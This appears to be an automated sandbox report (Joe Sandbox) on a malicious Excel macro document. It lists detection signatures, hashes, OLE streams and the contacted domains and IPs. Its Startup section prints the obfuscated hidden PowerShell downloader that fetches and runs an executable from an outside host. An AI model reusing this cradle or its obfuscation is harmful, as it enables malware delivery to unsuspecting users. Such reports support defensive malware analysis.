ID: 47598 Sample Name: 18-02-22-(k- irie).xls Cookbook: defaultwindowsofficecookbook.jbs Time: 01:30:58 Date: 23/02/2018 Version: 21.0.0 Table of Contents
Table of Contents 2 Analysis Report 4 Overview 4 General Information 4 Detection 4 Confidence 5 Classification 5 Analysis Advice 5 Signature Overview 6 AV Detection: 6 Software Vulnerabilities: 6 Networking: 6 Data Obfuscation: 6 Spreading: 6 System Summary: 6 HIPS / PFW / Operating System Protection Evasion: 7 Anti Debugging: 7 Malware Analysis System Evasion: 7 Hooking and other Techniques for Hiding and Protection: 7 Language, Device and Operating System Detection: 7 Behavior Graph 7 Simulations 8 Behavior and APIs 8 Antivirus Detection 8 Initial Sample 8 Dropped Files 8 Unpacked PE Files 8 Domains 9 Yara Overview 9 Initial Sample 9 PCAP (Network Traffic) 9 Dropped Files 9 Memory Dumps 9 Unpacked PEs 9 Joe Sandbox View / Context 9 IPs 9 Domains 9 ASN 9 Dropped Files 10 Screenshot 10 Startup 11 Created / dropped Files 11 Contacted Domains/Contacted IPs 12 Contacted Domains 12 Contacted IPs 12 Static File Info 13 General 13 File Icon 13 Static OLE Info 13 General 13 OLE File "18-02-22-(k-irie).xls" 14 Indicators 14 Summary 14 Document Summary 14 Streams with VBA 14 Copyright Joe Security LLC 2018 Page 2 of 23 VBA File Name: Sheet1.cls, Stream Size: 977 14 General 14 VBA Code Keywords 14 VBA Code 14 VBA File Name: ThisWorkbook.cls, Stream Size: 5760 14 General 14 VBA Code Keywords 15 VBA Code 16 Streams 16 Stream Path: \x1CompObj, File Type: data, Stream Size: 107 16 General 16 Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 240 16 General 16 Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 168 17 General 17 Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 55082 17 General 17 Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 425 17 General 17 Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62 17 General 17 Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3005 18 General 18 Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1414 18 General 18 Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 106 18 General 18 Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 548 18 General 18 Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 481 19 General 19 Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 524 19 General 19 Network Behavior 19 Network Port Distribution 19 TCP Packets 19 UDP Packets 20 ICMP Packets 20 DNS Queries 20 DNS Answers 20 HTTP Request Dependency Graph 20 HTTP Packets 20 Code Manipulations 21 Statistics 21 Behavior 21 System Behavior 21 Analysis Process: EXCEL.EXE PID: 3268 Parent PID: 2948 21 General 21 File Activities 21 Registry Activities 22 Key Created 22 Analysis Process: cmd.exe PID: 3348 Parent PID: 3268 22 General 22 Analysis Process: powershell.exe PID: 3376 Parent PID: 3348 22 General 22 File Activities 23 File Created 23 File Deleted 23 Registry Activities 23 Disassembly 23 Code Analysis 23
Copyright Joe Security LLC 2018 Page 3 of 23 Analysis Report
Overview
General Information
Joe Sandbox Version: 21.0.0 Analysis ID: 47598 Start time: 01:30:58 Joe Sandbox Product: CloudBasic Start date: 23.02.2018 Overall analysis duration: 0h 4m 16s Hypervisor based Inspection enabled: false Report type: light Sample file name: 18-02-22-(k-irie).xls Cookbook file name: defaultwindowsofficecookbook.jbs Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1) Number of analysed new started processes analysed: 7 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies HCA enabled EGA enabled HDC enabled GSI enabled (VBA) Analysis stop reason: Timeout Detection: MAL Classification: mal84.evad.expl.winXLS@5/3@3/2 HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 EGA Information: Failed HDC Information: Failed Cookbook Comments: Adjust boot time Found application associated with file extension: .xls Found Word or Excel or PowerPoint document Simulate clicks Number of clicks 142 Close Viewer
Warnings: Show All Exclude process from analysis (whitelisted): WmiApSrv.exe, conhost.exe, dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: EXCEL.EXE, powershell.exe
Detection
Strategy Score Range Reporting Detection
Threshold 84 0 - 100 Report FP / FN
Copyright Joe Security LLC 2018 Page 4 of 23 Confidence
Strategy Score Range Further Analysis Required? Confidence
Threshold 5 0 - 5 false
Classification
Ransomware
Miner Spreading
mmaallliiiccciiioouusss
malicious
Evader Phishing
sssuusssppiiiccciiioouusss
suspicious
cccllleeaann
clean
Exploiter Banker
Spyware Trojan / Bot
Adware
Analysis Advice
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior Copyright Joe Security LLC 2018 Page 5 of 23 Signature Overview
• AV Detection • Software Vulnerabilities • Networking • Data Obfuscation • Spreading • System Summary • HIPS / PFW / Operating System Protection Evasion • Anti Debugging • Malware Analysis System Evasion • Hooking and other Techniques for Hiding and Protection • Language, Device and Operating System Detection
Click to jump to signature section
AV Detection:
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Software Vulnerabilities:
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Document exploit detected (process start blacklist hit)
Networking:
Downloads files from webservers via HTTP
Performs DNS lookups
Urls found in memory or binary data
Domain name seen in connection with other malware
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
Data Obfuscation:
Document contains an embedded VBA with many string operations indicating source code obfuscation
Obfuscated command line found
Spreading:
Enumerates the file system
System Summary:
Checks whether correct version of .NET is installed
Found graphical window changes (likely an installer)
Uses Microsoft Silverlight
Checks if Microsoft Office is installed
Copyright Joe Security LLC 2018 Page 6 of 23 Uses new MSVCR Dlls
Binary contains paths to debug symbols
Binary contains paths to development resources
Classification label
Creates files inside the user directory
Creates temporary files
Document contains an OLE Workbook stream indicating a Microsoft Excel file
Found command line output
Parts of this applications are using the .NET runtime (Probably coded in C#)
Reads ini files
Reads software policies
Sample is known by Antivirus (Virustotal or Metascan)
Spawns processes
Uses an in-process (OLE) Automation server
Creates mutexes
Document contains embedded VBA macros
Reads the hosts file
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA macro which may execute processes
Powershell connects to network
HIPS / PFW / Operating System Protection Evasion:
May try to detect the Windows Explorer process (often used for injection)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Anti Debugging:
Creates guard pages, often used to prevent reverse engineering and debugging
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Enables debug privileges
Malware Analysis System Evasion:
Queries a list of all running processes
Enumerates the file system
Hooking and other Techniques for Hiding and Protection:
Disables application error messsages (SetErrorMode)
System process connects to network (likely due to code injection or exploit)
Language, Device and Operating System Detection:
Queries the cryptographic machine GUID
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Behavior Graph
Copyright Joe Security LLC 2018 Page 7 of 23 Hide Legend Behavior Graph Legend: ID: 47598 Process Sample: 18-02-22-(k-irie).xls
Startdate: 23/02/2018 Signature Architecture: WINDOWS Score: 84 Created File DNS/IP Info
holdoc.com Is Dropped
started Is Windows Process
Multi AV Scanner detection Multi AV Scanner detection Obfuscated command line 3 other signatures for domain / URL for submitted file found Number of created Registry Values
Number of created Files
EXCEL.EXE Visual Basic
34 17 Delphi Java
Document exploit detected Obfuscated command line (process start blacklist started .Net C# or VB.NET found hit) C, C++ or other language
cmd.exe Is malicious
Obfuscated command line started found
powershell.exe
12 8
holdoc.com 8.8.8.8, 53, 53440, 56842 92.53.78.250, 49163, 49164, 80 GOOGLE-GoogleIncUS SELECTELRU United States Russian Federation
System process connects to network (likely due Powershell connects to code injection or to network exploit)
Simulations
Behavior and APIs
Time Type Description 01:31:49 API Interceptor 1x Sleep call for process: EXCEL.EXE modified from: 30000ms to: 100ms 01:31:49 API Interceptor 1x Sleep call for process: EXCEL.EXE modified from: 60000ms to: 100ms 01:31:49 API Interceptor 1x Sleep call for process: EXCEL.EXE modified from: 300000ms to: 100ms 01:31:54 API Interceptor 1x Sleep call for process: powershell.exe modified from: 30000ms to: 100ms
Antivirus Detection
Initial Sample
Source Detection Scanner Label Link 18-02-22-(k-irie).xls 31% virustotal Browse
Dropped Files
No Antivirus matches
Unpacked PE Files
Copyright Joe Security LLC 2018 Page 8 of 23 No Antivirus matches
Domains
Source Detection Scanner Label Link holdoc.com 4% virustotal Browse
Yara Overview
Initial Sample
No yara matches
PCAP (Network Traffic)
No yara matches
Dropped Files
No yara matches
Memory Dumps
No yara matches
Unpacked PEs
No yara matches
Joe Sandbox View / Context
IPs
No context
Domains
Associated Sample Match Name / URL SHA 256 Detection Link Context holdoc.com 2018.2.20[s_kawadu].xls 8b93eb0c322299acebe65e6014a malicious Browse 47.52.193.63 ccdc02f289e3a4bf411783e8bfcd 01e887174 2018.2.20[s_kawadu].xls 8b93eb0c322299acebe65e6014a malicious Browse 47.52.193.63 ccdc02f289e3a4bf411783e8bfcd 01e887174
ASN
Associated Sample Match Name / URL SHA 256 Detection Link Context SELECTELRU 7969991545.doc 5ace6070a2f1c6ecaf06b1f84469 malicious Browse 82.202.221.88 98e42540254c1d117064445e44f 8ccc56739 trickbot.exe 91f78068e996b1b32a3539746b6 malicious Browse 95.213.237.224 b683f5fa40e7be009b779c56e215 b521df6c5 YhAjMikwxY.docx 8c30c4096f77feb5103eb18cddc5 malicious Browse 77.244.219.111 cb6b74759e7782524dff5bf73356 89dce3fd
Copyright Joe Security LLC 2018 Page 9 of 23 Associated Sample Match Name / URL SHA 256 Detection Link Context http://outpostbeerco malicious Browse 78.155.207.67 mpany.com/? 14A7a2hYF 84Gn38Amn=rjones@ric ohforensics.com php.exe 57b374e2d2f002c11c69b454fcf1 malicious Browse 82.202.238.204 aa57bd971cd0638eca12c6691cd b6a2f011c jas-pol.com.pl/jerse malicious Browse 95.213.236.187 y/meronto.png http://princessleith malicious Browse 82.202.238.203 eatonde-grimaldi.com/? 3os4aoVie6DsIKoEd= BOGOQJQADW CQlPAGCF3LUw 4877_Payment.doc 4972a3d5648283283163eac33a6 malicious Browse 92.53.66.60 235fa7c864eae8058d33543b690 27fd372a01 gGCRjiezSf.doc d4443f53a7966b856facd134edc7 malicious Browse 92.53.78.209 7f8ae8a7e7d0d89974a266ca3e5 77da3c0a6 23515_155123.doc 7157e139fa9e8f1394319742a2f6 malicious Browse 95.213.191.147 65965e939299217586e51d4c207 a4048d7cf 23515_155123.doc 7157e139fa9e8f1394319742a2f6 malicious Browse 95.213.204.162 65965e939299217586e51d4c207 a4048d7cf banan.exe 8a9741c8a47088e1633ea9b1c9a malicious Browse 95.213.251.150 48fd00aa16ee2a99652435ce77a 5ccaaf2fa9 yUGZKvXCSt.doc 5a9e67a59c80a89293f676b55b4 malicious Browse 95.213.194.234 157fbbdd7c504224937b71e352c a7386e1028 Jgm1omfumn.doc 6fbf7c2ba517468f2a2a80d80c2a malicious Browse 92.53.66.115 e220fed9ec31c272dd1948dfd6c3 f5aed14b http://bbsmoke.com?F malicious Browse 92.53.77.216 E7JoX=dcairns@bchous ing.org 37Faktura_VAT_902675 fbe473e2f716f588438ec7a9e27e malicious Browse 95.213.235.66 109.js 9afaed32106ffa55681ff3107a09a f83c057 yUGZKvXCSt.doc 5a9e67a59c80a89293f676b55b4 malicious Browse 78.155.206.154 157fbbdd7c504224937b71e352c a7386e1028 http://luxurytds.com malicious Browse 95.213.144.13 /go.php?sid=1 BXT8KfER5.exe 0c5446a511b349773e1031b88cd malicious Browse 185.143.174.234 4fd997cd98b686a4cd4ca5dc16b 386961e2c5 virus.exe a7e40660025a2f92bf5b27a429c2 malicious Browse 80.93.182.14 a65038932203d7d6c33168f01c4 7b34868fa
Dropped Files
No context
Screenshot
Copyright Joe Security LLC 2018 Page 10 of 23 Startup
System is w7 EXCEL.EXE (PID: 3268 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde MD5: 716335EDBB91DA84FC102425BFDA957E) cmd.exe (PID: 3348 cmdline: cMd /c'poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2} {4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','%temp%.exe')}while(!$?);&(\'{0}{2}{1}\'-f'star','ss','t-proce') '%localappdata%.exe''' MD5: AD7B9C14083B52BC532FBA5948342B98) powershell.exe (PID: 3376 cmdline: poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0} {2}{4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','C:\Users\HERBBL~1\AppData\Local\Temp.exe')}while(!$?);&(\'{0}{2}{1}\'-f'sta r','ss','t-proce') 'C:\Users\user\AppData\Local.exe'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA) cleanup
Created / dropped Files
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\18-02-22-(k-irie).LNK File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 1 3:59:30 2017, mtime=Sun Sep 24 13:59:30 2017, atime=Fri Feb 23 00:31:50 2018, length=76288, window=hide Size (bytes): 2160 Entropy (8bit): 4.507208926102992 Encrypted: false MD5: 941E5D0C91732D133D3EA6FCC59651EC SHA1: F79505767A693BC2431A1998CABAFC764286F0ED SHA-256: 1E589ACDB46B7DB1C8747C2A13E11AF6183FE3BBDB83F0A00CB03E580C8F814A SHA-512: 0E29F144B8E6B10C771ABED68BCDB0E85B250D72536565EB6F12C761242790348643968AC17F4D4AED4BF1267DD 66A574600640343460306051B13BE3C4F3488
Copyright Joe Security LLC 2018 Page 11 of 23 C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\18-02-22-(k-irie).LNK Malicious: false Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat File Type: ASCII text, with CRLF line terminators Size (bytes): 89 Entropy (8bit): 4.308920442144782 Encrypted: false MD5: 7ECA590620832E8C4F36972F48AB7288 SHA1: 8C564C6FD711A53DCCFB71E204F9C74287840EE5 SHA-256: 7323108B5FB167A226B7D6BBA70E8F7671B3E883C043CA3E5D27E3E9AD33D712 SHA-512: D0A45C0EC7840AC91E7D5024CC0855944610F5DDFA7AC726EB852A325542764960420B9830FA068D19D5FA7D58D ECC477475B24E81BF768D7B98F2318C81CFE1 Malicious: false Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1IS066BSM420YYOJ2CE3.temp File Type: data Size (bytes): 8016 Entropy (8bit): 3.5770961918243596 Encrypted: false MD5: DE54B0C562108894094B2BEF832CBF46 SHA1: A046BDD493711C314BC0E8040778A17E155C16C5 SHA-256: F268E4960C227505DFEA1FD03987D52DC45095AF7C0820D8C7AA3EB17635C0EE SHA-512: 0E850A2BDA1A32E812B45FAF424131E7347F09B14CAA0691468CA48A96929934664E57BADAAEAF61BA509B750A 7B0834D24E6E18835D7F604D0ADD61508C32DA Malicious: false Reputation: low
Contacted Domains/Contacted IPs
Contacted Domains
Name IP Active Malicious Antivirus Detection holdoc.com 92.53.78.250 true true 4%, virustotal, Browse
Contacted IPs
Copyright Joe Security LLC 2018 Page 12 of 23 No. of IPs < 25%
25% < No. of IPs < 50% 50% < No. of IPs < 75%
75% < No. of IPs
IP Country Flag ASN ASN Name Malicious 8.8.8.8 United States 15169 GOOGLE-GoogleIncUS false 92.53.78.250 Russian Federation 49505 SELECTELRU true
Static File Info
General
File type: 0 Entropy (8bit): 6.047278042035873 TrID: Microsoft Excel sheet (30009/1) 46.87% Microsoft Excel sheet (alternate) (24509/1) 38.28% Generic OLE2 / Multistream Compound File (8008/1) 12.51% Java Script embedded in Visual Basic Script (1500/0) 2.34%
File name: 18-02-22-(k-irie).xls File size: 75264 MD5: 1fde2f4438d222541a78d63e85043e63 SHA1: a2e40c537dc3a73b77199a4d8eaf76826f819df6 SHA256: f29afa4665c7d226d093d083a72431237b76c9dbb10bf53 1c3eaa56090ecf277 SHA512: abecf769db1050cec94a76b0cc7eadd645e3061d2bdde6 bd2bca0dbcec3e035176b3ecee64bff1e72a75e864b25a6 882b5ada58f421c0a3554ec366a07de67a1 File Content Preview: ...... >...... o......
File Icon
Static OLE Info
General Document Type: OLE Number of OLE Files: 1 Copyright Joe Security LLC 2018 Page 13 of 23 OLE File "18-02-22-(k-irie).xls"
Indicators Has Summary Info: True Application Name: Microsoft Excel Encrypted Document: False Contains Word Document Stream: False Contains Workbook/Book Stream: True Contains PowerPoint Document Stream: False Contains Visio Document Stream: False Contains ObjectPool Stream: False Flash Objects Count: 0 Contains VBA Macros: True
Summary Code Page: 1251 Create Time: 2017-10-19 07:59:05 Last Saved Time: 2018-02-22 08:21:27 Creating Application: Microsoft Excel Security: 0
Document Summary Document Code Page: -535 Thumbnail Scaling Desired: False Contains Dirty Links: False Shared Document: False Changed Hyperlinks: False Application Version: 917504
Streams with VBA
VBA File Name: Sheet1.cls, Stream Size: 977
General Stream Path: _VBA_PROJECT_CUR/VBA/Sheet1 VBA File Name: Sheet1.cls Stream Size: 977 Data ASCII: ...... # ...... x ...... M E ...... Data Raw: 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c3 e6 d2 fd 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code Keywords
Keyword False VB_Exposed Attribute VB_Name VB_Creatable VB_PredeclaredId VB_GlobalNameSpace VB_Base VB_Customizable VB_TemplateDerived
VBA Code
VBA File Name: ThisWorkbook.cls, Stream Size: 5760
General Stream Path: _VBA_PROJECT_CUR/VBA/ThisWorkbook VBA File Name: ThisWorkbook.cls Stream Size: 5760 Copyright Joe Security LLC 2018 Page 14 of 23 General Data ASCII: ...... J . . . X ...... ? . . . . # ...... < ...... X ` . ) ~ . I . . . . | s ...... F ...... t . F . - Q . . . s ...... x ...... t . F . - Q . . . s . . X ` . ) ~ . I . . . . | s ...... M E ...... Data Raw: 01 16 01 00 03 00 01 00 00 1c 07 00 00 e4 00 00 00 10 02 00 00 4a 07 00 00 58 07 00 00 f4 10 00 00 00 00 00 00 01 00 00 00 c3 e6 f3 3f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 d9 58 60 1a 29 7e f6 49 be 02 fe bd 7c 73 f2 e9 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code Keywords
Keyword cryocamera "ThisWorkbook" capponecheese zyzybridge ramzessii "xeC" Shell "p://holdoc.com/lantrace','%" "Ct") petroliummer() "owe" "t','ne" depminng Right(Left("multiplexed", copengagend gabrilla False Workbook_Open() zulusniga petroliummer Array("t" (\""{" ramzessii() zyzybridge() gabrilla() goldgoldtime() "o','bj" nagilanile vandamilkler "do{sl" "st','.we" samaramama() Right(Left("lighttight", fidopinions brucegodd Minute(Now), brucegodd(depminng) "}\"" "bclie','em','nt','.ne'" "f'-" "ppd" VB_Base Randomize Left("calamander", samaramama, normalcorrecttoolk "l'+'e')." hannydear VB_Creatable Now(), VB_Exposed Now()) "'sy"
Copyright Joe Security LLC 2018 Page 15 of 23 Keyword maffii fatalerrrrord "DDen "'+'o" fatalerrrrord() Array(Now(), msoAlignLefts depminng() "RS", virtoserer samaramama "-N") "-e") Attribute goldgoldtime Array(Second(Now), VB_PredeclaredId VB_GlobalNameSpace okolokojim heroscopuses "ata") VB_Name Int(Rnd Function VB_Customizable SingleSong() ").(" SingleSong labuyetero VB_TemplateDerived "oke('" Left("Invisible", "w'+'n" Monochrome "t',"
VBA Code
Streams
Stream Path: \x1CompObj, File Type: data, Stream Size: 107
General Stream Path: \x1CompObj File Type: data Stream Size: 107 Entropy: 4.18482950044 Base64 Encoded: True Data ASCII: ...... F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q ...... Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 240
General Stream Path: \x5DocumentSummaryInformation File Type: data Stream Size: 240 Entropy: 3.03421468289 Base64 Encoded: True
Copyright Joe Security LLC 2018 Page 16 of 23 General Data ASCII: ...... + , . . 0 ...... H ...... P ...... X ...... ` ...... h ...... p ...... x ...... 2 0 1 8 . . . 2 . . . 2 2 ...... W o r k s h e e t s ...... Data Raw: fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 9a 00 00 00 02 00 00 00 e9 fd 00 00
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 168
General Stream Path: \x5SummaryInformation File Type: data Stream Size: 168 Entropy: 3.4271007557 Base64 Encoded: False Data ASCII: ...... O h . . . . . + ' . . 0 . . . x ...... 8 ...... @ ...... X ...... d ...... p ...... M i c r o s o f t E x c e l . @ . . . . . @ " . H . . @ . . . . ] 2 " ...... Data Raw: fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 78 00 00 00 05 00 00 00 01 00 00 00 38 00 00 00 12 00 00 00 40 00 00 00 0c 00 00 00 58 00 00 00 0d 00 00 00 64 00 00 00 13 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 10 00 00 00 4d 69 63 72 6f 73 6f 66
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 55082
General Stream Path: Workbook File Type: Applesoft BASIC program data, first line number 16 Stream Size: 55082 Entropy: 6.52470798361 Base64 Encoded: True Data ASCII: ...... f 2 ...... \\ . p . . . . V A R M U S B . . . . . a ...... = ...... T h i s W o r k b o o k ...... = . . . . . i . . l . 7 8 ...... X . @ Data Raw: 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 06 00 00 56 41 52 4d 55 53 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 425
General Stream Path: _VBA_PROJECT_CUR/PROJECT File Type: ASCII text, with CRLF line terminators Stream Size: 425 Entropy: 5.34572053125 Base64 Encoded: True Data ASCII: I D = " { 6 E 9 6 D 5 0 9 - D 0 3 C - 4 D A F - B C 3 2 - 9 0 C B 9 0 E 3 A 5 3 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 1 9 3 6 6 8 E 6 A 8 E 6 A 8 E 6 A 8 E 6 A " . . D P B = " 7 E 7 C 8 9 9 E 9 B 6 6 8 9 6 7 8 9 6 7 8 9 " . . G C = " 6 B 6 9 9 C 8 D 8 8 8 E 8 8 Data Raw: 49 44 3d 22 7b 36 45 39 36 44 35 30 39 2d 44 30 33 43 2d 34 44 41 46 2d 42 43 33 32 2d 39 30 43 42 39 30 45 33 41 35 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62
General Stream Path: _VBA_PROJECT_CUR/PROJECTwm File Type: data Stream Size: 62 Entropy: 3.05546715432 Base64 Encoded: False Data ASCII: T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
Copyright Joe Security LLC 2018 Page 17 of 23 General Data Raw: 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3005
General Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT File Type: data Stream Size: 3005 Entropy: 4.49677521188 Base64 Encoded: False Data ASCII: . a ...... * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . Data Raw: cc 61 97 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1414
General Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0 File Type: data Stream Size: 1414 Entropy: 4.24915005422 Base64 Encoded: False Data ASCII: . K * ...... r U ...... ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ l ...... 0 . . * B L . . P . . . } ...... y ...... Data Raw: 93 4b 2a 97 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 6c 00 00 7f 00 00 00 00 15 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 106
